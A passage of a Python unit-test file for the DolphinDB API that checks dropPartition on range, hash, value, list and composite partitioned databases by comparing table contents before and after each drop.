cls.s = ddb.session()
cls.s.connect(HOST, PORT, "admin", "123456")
dbPath = DBInfo.dfsDBName
script = """
if(existsDatabase('{dbPath}'))
dropDatabase('{dbPath}')
""".format(dbPath=dbPath)
cls.s.run(script)
def test_dropPartition_dfs_range_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
bound = str(DBInfo.tableRows//10 + 1)
# tb1 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/1_" + bound + "'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_range_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
bound = str(DBInfo.tableRows*4 // 10 + 1)
partitions = ["'/1_1001'", "'/1001_2001'", "'/2001_3001'", "'/3001_4001'"]
# should be altered with DBInfo.tableRows
# tb1 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, partitions, tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, partitions, tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id>=" + bound)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, partitions)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_hash_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['0'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id!=10")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_hash_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['0', '1'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0', '1'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where id in 2..9")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['0', '1'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_value_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['2010.01.01'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date!=2010.01.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_value_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(date,2010.01.01+[0,7,14,21])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ['2010.01.01', '2010.01.08', '2010.01.15', '2010.01.22'])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_list_drop_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/List0'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List0'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List0'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["'/List1'", "'/List2'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id>=3")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_range_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_range_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,3:6)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
